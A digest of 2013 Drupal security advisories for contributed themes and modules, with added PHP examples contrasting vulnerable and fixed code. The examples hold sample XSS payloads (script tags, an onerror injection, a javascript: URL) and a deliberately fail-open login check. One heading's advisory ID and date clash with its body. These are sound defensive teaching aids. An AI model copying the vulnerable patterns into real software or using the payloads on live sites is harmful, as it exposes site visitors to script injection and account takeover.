[Full-disclosure] [Security-news] SA-CONTRIB-2013-031 - Premium Responsive theme - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1929508

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-031
  * Project: Premium Responsive [1] (third-party theme)
  * Version: 7.x
  * Date: 2013-February-27
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION

This third-party contributed theme changes Drupal's interface.

The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage, leading to a Cross Site Scripting (XSS) vulnerability.

This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * Premium Responsive versions prior to 7.x-1.6

Drupal core is not affected. If you do not use the contributed Premium Responsive [4] theme, there is nothing you need to do.

SOLUTION

Install the latest version:

  * Premium Responsive 7.x-1.6 [5]

Also see the Premium Responsive [6] project page.

REPORTED BY

  * Greg Knaddison [7] of the Drupal Security Team

FIXED BY

  * saran.quardz [8], the theme maintainer

COORDINATED BY

  * Greg Knaddison [9] of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/responsive
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/responsive
[5] http://drupal.org/node/1730752
[6] http://drupal.org/project/responsive
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/1031208
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/91990
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration

___
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-030 - Clean Theme - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1929500

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-030
  * Project: Clean Theme [1] (third-party theme)
  * Version: 7.x
  * Date: 2013-February-27
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION

This third-party contributed theme changes Drupal's interface.

The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage, leading to a Cross Site Scripting (XSS) vulnerability.

This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * Clean Theme versions prior to 7.x-1.3

Drupal core is not affected. If you do not use the contributed Clean Theme [4] theme, there is nothing you need to do.

SOLUTION

Install the latest version:

  * Clean Theme 7.x-1.3 [5]

Also see the Clean Theme [6] project page.

REPORTED BY

  * Greg Knaddison [7] of the Drupal Security Team

FIXED BY

  * saran.quardz [8], the theme maintainer

COORDINATED BY

  * Greg Knaddison [9] of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/clean_theme
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/clean_theme
[5] http://drupal.org/node/1723532
[6] http://drupal.org/project/clean_theme
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/1031208
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/91990
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-032 - Company theme - Cross Site Scripting (XSS)
View online: https://drupal.org/node/1929512

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-032
  * Project: Company theme [1] (third-party theme)
  * Version: 7.x
  * Date: 2013-February-27
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION

This third-party contributed theme changes Drupal's interface.

The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage, leading to a Cross Site Scripting (XSS) vulnerability.

This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * Company Theme versions prior to 7.x-1.4

Drupal core is not affected. If you do not use the contributed Company theme [4] theme, there is nothing you need to do.

SOLUTION

Install the latest version:

  * Company Theme 7.x-1.4 [5]

Also see the Company theme [6] project page.

REPORTED BY

  * Greg Knaddison [7] of the Drupal Security Team

FIXED BY

  * saran.quardz [8], the theme maintainer

COORDINATED BY

  * Greg Knaddison [9] of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/company
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/company
[5] http://drupal.org/node/1724232
[6] http://drupal.org/project/company
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/1031208
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/91990
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-027 - Professional theme - Cross Site Scripting (XSS)
View online: https://drupal.org/node/1929486

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-015
  * Project: Professional [1] (third-party theme)
  * Version: 7.x
  * Date: 2013-February-06
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION

This third-party contributed theme changes Drupal's interface.

The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage, leading to a Cross Site Scripting (XSS) vulnerability.

This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * Professional Theme versions prior to 7.x-1.4

Drupal core is not affected. If you do not use the contributed Professional [4] theme, there is nothing you need to do.

SOLUTION

Install the latest version:

  * Professional Theme 7.x-1.4 [5]

Also see the Professional [6] project page.

REPORTED BY

  * Greg Knaddison [7] of the Drupal Security Team

FIXED BY

  * saran.quardz [8], the theme maintainer

COORDINATED BY

  * Greg Knaddison [9] of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/professional_theme
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/professional_theme
[5] http://drupal.org/node/1730768
[6] http://drupal.org/project/professional_theme
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/1031208
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/91990
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-025 - Fresh Theme - Cross Site Scripting (XSS)
View online: https://drupal.org/node/1929482

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-025
  * Project: Fresh theme [1] (third-party theme)
  * Version: 7.x
  * Date: 2013-February-27
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION

This third-party contributed theme changes Drupal's interface.

The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage, leading to a Cross Site Scripting (XSS) vulnerability.

This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * Fresh Theme versions prior to 7.x-1.4

Drupal core is not affected. If you do not use the contributed Fresh Theme [4], there is nothing you need to do.

SOLUTION

Install the latest version:

  * Fresh Theme 7.x-1.4 [5]

Also see the Fresh Theme [6] project page.

REPORTED BY

  * Greg Knaddison [7] of the Drupal Security Team

FIXED BY

  * saran.quardz [8], the theme maintainer

COORDINATED BY

  * Greg Knaddison [9] of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/fresh
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/fresh
[5] http://drupal.org/node/1723316
[6] http://drupal.org/project/fresh
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/1031208
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/91990
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-026 - Best Responsive Theme - Cross Site Scripting (XSS)
View online: https://drupal.org/node/1929484

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-026
  * Project: Best Responsive [1] (third-party theme)
  * Version: 7.x
  * Date: 2013-February-27
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION

Best Responsive theme is a lightweight Drupal 7 theme with a modern look and feel.

The theme doesn't properly sanitize user-entered content in the social icon, leading to a Cross Site Scripting (XSS) vulnerability.

This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * Best Responsive Theme 7.x-1.x versions prior to 7.x-1.1.

Drupal core is not affected. If you do not use the contributed Best Responsive [4] theme, there is nothing you need to do.

SOLUTION

Install the latest version:

  * If you use the Best Responsive Theme for Drupal 7.x, upgrade to Best Responsive Theme 7.x-1.1 [5]

Also see the Best Responsive [6] project page.

REPORTED BY

  * Greg Knaddison [7] of the Drupal Security Team

FIXED BY

  * saran.quardz [8], the theme maintainer

COORDINATED BY

  * Greg Knaddison [9] of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/best_responsive
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/best_responsive
[5] http://drupal.org/node/1929390
[6] http://drupal.org/project/best_responsive
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/1031208
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/91990
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-024 - Creative Theme - Cross Site Scripting (XSS)
View online: https://drupal.org/node/1929474

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-024
  * Project: Creative Theme [1] (third-party theme)
  * Version: 7.x
  * Date: 2013-February-27
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION

Creative Theme is a lightweight Drupal 7 theme with a modern look and feel.

The theme doesn't properly sanitize user-entered content in the social icon, leading to a Cross Site Scripting (XSS) vulnerability.

This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * Creative Theme 7.x-1.x versions prior to 7.x-1.2.

Drupal core is not affected. If you do not use the contributed Creative Theme [4], there is nothing you need to do.

SOLUTION

Install the latest version:

  * If you use the Creative Theme for Drupal 7.x, upgrade to Creative Theme 7.x-1.2 [5]

Also see the Creative Theme [6] project page.

REPORTED BY

  * Greg Knaddison [7] of the Drupal Security Team

FIXED BY

  * saran.quardz [8], the theme maintainer

COORDINATED BY

  * Greg Knaddison [9] of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/creative
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/creative
[5] http://drupal.org/node/1929380
[6] http://drupal.org/project/creative
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/1031208
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/91990
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
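The seven theme advisories above (SA-CONTRIB-2013-024 through -032), and the Boxes and Search API sorts advisories further down this digest, describe one bug class: a value typed into an administrative form (a slide caption or image path, a social-icon URL, a box subject, a field label) is printed into page HTML without being escaped for the context it lands in. The block below is an added, stand-alone PHP illustration of that pattern and of the fix; it is not code from any of the affected themes or modules, and not Drupal core. `check_plain()` and `check_url()` are the real Drupal 7 helpers a theme should call; the stand-ins here are defined only so the file runs outside Drupal (the `check_url()` stand-in is a simplified allowlist version of Drupal's protocol stripping). The setting names (`slide_title_1`, `slide_image_1`, `social_twitter_url`) and the hostile sample values are constructed for the demo.

```php
<?php
// Added example: output escaping for admin-entered theme settings.
// Stand-alone PHP 7+; not code from the affected themes or from Drupal core.

// Stand-ins so the file runs outside Drupal. Inside a Drupal 7 theme, call the
// real check_plain() / check_url() from core instead.
if (!function_exists('check_plain')) {
    function check_plain($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('check_url')) {
    // Simplified version of Drupal's filter_xss_bad_protocol(): strip any
    // leading scheme that is not on a short allowlist, then HTML-escape.
    function check_url($uri) {
        $uri = (string) $uri;
        $allowed = ['http', 'https', 'mailto', 'ftp'];
        while (preg_match('/^\s*([a-z][a-z0-9+.\-]*):/i', $uri, $m)) {
            if (in_array(strtolower($m[1]), $allowed, true)) {
                break;
            }
            $uri = substr($uri, strlen($m[0]));   // drop javascript:, data:, ...
        }
        return check_plain($uri);
    }
}

// Constructed settings: what a user holding 'administer themes' could type into
// the theme settings form. A real template reads them with theme_get_setting().
function constructed_settings() {
    return [
        'slide_title_1'      => 'Welcome<script>alert(document.cookie)</script>',
        'slide_image_1'      => 'sites/default/files/slide1.jpg" onerror="alert(1)',
        'social_twitter_url' => 'javascript:alert(document.domain)',
    ];
}

// VULNERABLE shape: settings are concatenated straight into markup.
function render_slide_vulnerable(array $s) {
    return '<div class="slide">'
         . '<img src="' . $s['slide_image_1'] . '" alt="">'
         . '<h2>' . $s['slide_title_1'] . '</h2>'
         . '</div>';
}
function render_social_icon_vulnerable(array $s) {
    return '<a class="twitter" href="' . $s['social_twitter_url'] . '">Twitter</a>';
}

// FIXED shape: every setting is escaped for the context it lands in.
// Text nodes and plain attribute values: check_plain(); URL attributes: check_url().
function render_slide_fixed(array $s) {
    return '<div class="slide">'
         . '<img src="' . check_url($s['slide_image_1']) . '" alt="">'
         . '<h2>' . check_plain($s['slide_title_1']) . '</h2>'
         . '</div>';
}
function render_social_icon_fixed(array $s) {
    return '<a class="twitter" href="' . check_url($s['social_twitter_url']) . '">Twitter</a>';
}

// Cheap regression check a maintainer can keep beside the template: no raw
// <script>, no live javascript: href, no injected on* handler may survive.
function contains_live_script($html) {
    return stripos($html, '<script') !== false
        || preg_match('/href="\s*javascript:/i', $html) === 1
        || preg_match('/"\s+on[a-z]+="/i', $html) === 1;
}

$s = constructed_settings();
foreach (['render_slide_vulnerable', 'render_social_icon_vulnerable',
          'render_slide_fixed', 'render_social_icon_fixed'] as $fn) {
    $html = $fn($s);
    printf("%-30s %s\n%s\n\n", $fn, contains_live_script($html) ? 'XSS' : 'ok', $html);
}
```

The 'administer themes' mitigation named in every one of these advisories is real but thin: the permission is routinely handed to site builders who are not meant to be able to run script in every visitor's browser, and the same template is rendered for anonymous users. Escaping at the point of output, as in the fixed functions, is the fix that does not depend on who holds the permission.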
[Full-disclosure] [Security-news] SA-CONTRIB-2013-015 - Manager Change for Organic Groups - Cross site scripting (XSS)
View online: http://drupal.org/node/1916312

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-015
  * Project: Manager Change for Organic Groups [1] (third-party module)
  * Version: 7.x
  * Date: 2013-February-13
  * Security risk: Less critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION

This module extends Organic Groups to allow the manager of a group to select a new manager for their group (i.e. if they want to leave the group).

The autocomplete field for selecting a new manager didn't properly filter usernames.

The vulnerability is mitigated by the fact that Drupal's default registration validation prevents the creation of usernames that contain cross site scripting attacks. However, a contributed module may bypass that validation or alter the way usernames are loaded in a way that introduces an attack vector.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * Manager Change for Organic Groups 7.x-2.x versions prior to 7.x-2.1.

Drupal core is not affected. If you do not use the contributed module, there is nothing you need to do.

SOLUTION

Install the latest version:

  * If you use the 2.x branch of the Manager Change for Organic Groups module for Drupal 7.x, upgrade to Manager Change for Organic Groups 7.x-2.1 [4]

Also see the Manager Change for Organic Groups project page.

REPORTED BY

  * Michael Hess [5] of the Drupal Security Team

FIXED BY

  * Joe Haskins [6], the module maintainer

COORDINATED BY

  * Michael Hess [7] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8].

Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11].

[1] http://drupal.org/project/og_manager_change
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/node/1915408
[5] http://drupal.org/user/102818
[6] http://drupal.org/user/1358434
[7] http://drupal.org/user/102818
[8] http://drupal.org/contact
[9] http://drupal.org/security-team
[10] http://drupal.org/writing-secure-code
[11] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-016 - Banckle Chat - Access bypass - Unsupported
View online: http://drupal.org/node/1916370

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-016
  * Project: Banckle Chat [1] (third-party module)
  * Version: 7.x
  * Date: 2013-February-13
  * Security risk: Highly critical [2]
  * Exploitable from: Remote
  * Vulnerability: Access bypass

DESCRIPTION

This module enables you to chat with the visitors of your web site.

The module doesn't sufficiently check access to its admin pages.

This vulnerability is not mitigated.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * All Banckle Chat 7.x-1.x versions.

Drupal core is not affected. If you do not use the contributed Banckle Chat [4] module, there is nothing you need to do.

SOLUTION

Uninstall the module.

Also see the Banckle Chat [5] project page.

REPORTED BY

  * Wale Adesanya [6]
  * Lau Futtrup Rasmussen

FIXED BY

Not applicable.

COORDINATED BY

  * Gerhard Killesreiter [7] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8].

Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11].

[1] http://drupal.org/project/banckle_live_chat
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/banckle_live_chat
[5] http://drupal.org/project/banckle_live_chat
[6] http://drupal.org/user/1028156
[7] http://drupal.org/user/83
[8] http://drupal.org/contact
[9] http://drupal.org/security-team
[10] http://drupal.org/writing-secure-code
[11] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-012 - Google Authenticator login - Access Bypass
View online: http://drupal.org/node/1903282

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-012
  * Project: Google Authenticator login [1] (third-party module)
  * Version: 7.x
  * Date: 2013-January-30
  * Security risk: Highly critical [2]
  * Exploitable from: Remote
  * Vulnerability: Access bypass

DESCRIPTION

This module will allow you to add Time-based One-time Password Algorithm (also called "Two Step Authentication" or "Multi-Factor Authentication") support to user logins.

Users with the permission to use multi-factor authentication need to associate a Google Authenticator token with their account before they can use the multi-factor authentication for login. If this step is not done or not completed, their accounts can be logged in to by supplying the username only, due to a logic bug in the module's validation.

This means that when an administrator enables the module and grants the permission to use multi-factor authentication, all user accounts with that permission can be logged in to via the username.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * All 7.x versions prior to 7.x-1.3.

Drupal core is not affected. If you do not use the contributed Google Authenticator login [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

  * If you use the Google Authenticator login module for Drupal 7.x, upgrade to Google Authenticator login 7.x-1.3 [5]

Also see the Google Authenticator login [6] project page.

REPORTED BY

  * Patrick C. [7]

FIXED BY

  * attiks [8], the module maintainer

COORDINATED BY

  * Heine Deelstra [9] of the Drupal Security Team
  * Greg Knaddison [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/ga_login
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/ga_login
[5] http://drupal.org/node/1902102
[6] http://drupal.org/project/ga_login
[7] https://drupal.org/user/127758
[8] http://drupal.org/user/105002
[9] http://drupal.org/user/17943
[10] http://drupal.org/user/36762
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
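The advisory states the failure mode without code: an account that holds the multi-factor permission but has never enrolled a token can be logged in to with the username alone. The block below is an added, stand-alone PHP reconstruction of that bug class and of a fail-closed check; it is not the ga_login module's actual code and the exact shape of the module's bug is not known from the advisory. The TOTP routine is RFC 6238 over HMAC-SHA1 and is checked against the RFC's own test vector; the user store, the names `alice` and `bob`, their passwords and the enrolled secret are constructed for the demo, and Drupal's password hashing and `user_login_authenticate_validate()` are replaced by PHP's `password_hash()`/`password_verify()` so the file runs without Drupal.

```php
<?php
// Added example: fail-open vs fail-closed second-factor validation.
// Stand-alone PHP 7+; a reconstruction of the bug class, not the module's code.

// RFC 6238 TOTP over HMAC-SHA1. $secret is the raw key bytes (Google
// Authenticator shows it base32-encoded; that decoding is not part of this demo).
function totp_code($secret, $timestamp, $period = 30, $digits = 6) {
    $counter = intdiv($timestamp, $period);
    $msg  = pack('J', $counter);                       // 64-bit big-endian counter
    $hash = hash_hmac('sha1', $msg, $secret, true);
    $offset = ord($hash[19]) & 0x0f;                   // dynamic truncation (RFC 4226)
    $bin = ((ord($hash[$offset]) & 0x7f) << 24)
         | (ord($hash[$offset + 1]) << 16)
         | (ord($hash[$offset + 2]) << 8)
         |  ord($hash[$offset + 3]);
    return str_pad((string) ($bin % (10 ** $digits)), $digits, '0', STR_PAD_LEFT);
}

// Accept the current 30 s step and one step either side to absorb clock drift.
function totp_matches($secret, $code, $now) {
    foreach ([-1, 0, 1] as $step) {
        if (hash_equals(totp_code($secret, $now + 30 * $step), (string) $code)) {
            return true;
        }
    }
    return false;
}

// Constructed user store. 'totp_secret' === null models an account that was
// granted the MFA permission but never associated a token.
function constructed_accounts() {
    return [
        'alice' => ['pass' => password_hash('alice-pw', PASSWORD_DEFAULT),
                    'mfa_permission' => true, 'totp_secret' => '12345678901234567890'],
        'bob'   => ['pass' => password_hash('bob-pw', PASSWORD_DEFAULT),
                    'mfa_permission' => true, 'totp_secret' => null],
    ];
}

// VULNERABLE shape: the MFA branch decides the whole login. An account with the
// permission but no token is treated as "nothing to check" and accepted, so the
// username alone is enough; even enrolled accounts never have a password checked.
function login_vulnerable(array $accounts, $name, $pass, $code, $now) {
    if (!isset($accounts[$name])) {
        return false;
    }
    $acct = $accounts[$name];
    if ($acct['mfa_permission']) {
        if ($acct['totp_secret'] === null) {
            return true;                                       // BUG: fail-open
        }
        return totp_matches($acct['totp_secret'], $code, $now); // BUG: password skipped
    }
    return password_verify($pass, $acct['pass']);
}

// FIXED shape: the password is always verified first; the second factor is
// demanded whenever a token is enrolled. (A stricter policy would refuse login
// until enrolment is completed instead of falling back to password-only.)
function login_fixed(array $accounts, $name, $pass, $code, $now) {
    if (!isset($accounts[$name]) || !password_verify($pass, $accounts[$name]['pass'])) {
        return false;                                          // fail-closed
    }
    $acct = $accounts[$name];
    if ($acct['mfa_permission'] && $acct['totp_secret'] !== null) {
        return totp_matches($acct['totp_secret'], $code, $now);
    }
    return true;
}

// Self-check of the TOTP routine: RFC 6238 Appendix B, secret "12345678901234567890",
// T = 59, SHA-1, 8 digits.
if (totp_code('12345678901234567890', 59, 30, 8) !== '94287082') {
    throw new RuntimeException('TOTP implementation does not match RFC 6238 vector');
}

$accounts = constructed_accounts();
$now  = time();
$good = totp_code($accounts['alice']['totp_secret'], $now);

// bob never enrolled: an empty password and no code is enough for the vulnerable check.
var_dump(login_vulnerable($accounts, 'bob', '', '', $now));
var_dump(login_fixed($accounts, 'bob', '', '', $now));
var_dump(login_fixed($accounts, 'bob', 'bob-pw', '', $now));
// alice enrolled: password and a current code are both required by the fixed check.
var_dump(login_fixed($accounts, 'alice', 'alice-pw', $good, $now));
var_dump(login_fixed($accounts, 'alice', 'alice-pw', 'bad', $now));
```

The property worth carrying away is that the second factor must only ever tighten a login decision that the first factor has already passed; any branch in which "no token configured" short-circuits to success turns an optional hardening module into a password bypass for every account the permission was granted to.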
[Full-disclosure] [Security-news] SA-CONTRIB-2013-013 - Boxes - Cross site scripting (XSS)
View online: http://drupal.org/node/1903300

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-013
  * Project: Boxes [1] (third-party module)
  * Version: 7.x
  * Date: 2013-January-30
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION

The subject field for the included simple box doesn't escape HTML properly.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission to administer/edit boxes.

Wikipedia has more information about cross site scripting [3] (XSS).

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [4] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * Boxes 7.x-1.x versions prior to 7.x-1.1

Drupal core is not affected. If you do not use the contributed Boxes [5] module, there is nothing you need to do.

SOLUTION

Install the latest version:

  * If you use the Boxes module for Drupal 7.x, upgrade to Boxes 7.x-1.1 [6]

Also see the Boxes [7] project page.

REPORTED BY

  * Laura Dickinson [8]

FIXED BY

  * Tirdad Chaharlengi [9], the module maintainer

COORDINATED BY

  * Greg Knaddison [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/boxes
[2] http://drupal.org/security-team/risk-levels
[3] http://en.wikipedia.org/wiki/Xss
[4] http://cve.mitre.org/
[5] http://drupal.org/project/boxes
[6] http://drupal.org/node/1897016
[7] http://drupal.org/project/boxes
[8] http://drupal.org/user/337318
[9] http://drupal.org/user/383630
[10] http://drupal.org/user/36762
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-014 - Drush Debian Packaging - Information Disclosure - Unsupported
View online: http://drupal.org/node/1903324

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-014
  * Project: Drush Debian Packaging [1] (third-party module)
  * Version: 7.x
  * Date: 2013-January-30
  * Security risk: Critical [2]
  * Exploitable from: Local
  * Vulnerability: Information Disclosure

DESCRIPTION

This package is a tool to build Debian packages from a Drupal instance.

The module doesn't sufficiently protect database credentials.

This vulnerability is mitigated by the fact that an attacker must have shell access to the server.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * All versions.

Drupal core is not affected. If you do not use the contributed Drush Debian Packaging [4] module, there is nothing you need to do.

SOLUTION

Uninstall the package.

Also see the Drush Debian Packaging [5] project page.

REPORTED BY

  * jiri-catalyst [6]

FIXED BY

Not applicable.

COORDINATED BY

  * Greg Knaddison [7] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8].

Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11].

